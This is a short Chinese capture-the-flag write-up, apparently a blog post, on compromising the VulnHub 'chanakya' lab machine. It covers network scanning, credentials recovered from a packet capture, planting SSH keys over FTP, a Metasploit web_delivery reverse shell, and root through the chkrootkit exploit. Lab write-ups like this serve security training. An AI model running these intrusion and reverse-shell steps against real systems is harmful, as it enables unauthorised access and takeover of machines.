vulnhub-chanakya

chanakya

1.信息收集

nmap -sP 192.168.14.0/24
nmap -sV -p- 192.168.14.186

dirb http://192.168.14.186 -X ".txt,.php"

wget http://192.168.14.186/abuse.txt

<?php
echo str_rot13("nfubxn.cpncat")
?>

wget http://192.168.14.186/ashoka.pcapng



ashoka;kautilya

ftp 192.168.14.186

2.漏洞利用

ssh-keygen

cd /root/.ssh
mv id_rsa.pub authorized_keys

lcd /root/.ssh
mkdir .ssh
cd .ssh
put authorized_keys

ssh ashoka@192.168.14.186

3.提权

首先,利用反弹shell模块,为我们提供一个在目标机器上的meterpreter。

search web_de
use exploit/multi/script/web_delivery
set lhost 192.168.14.186
set lport 3333
set uripath /
exploit 生成


下面进行提权模块利用,成功利用 Chkrootkit模块提权root

back
search chkrootkit
use exploit/unix/local/chkrootkit
set sessions 1
run


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Wh1teSu

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值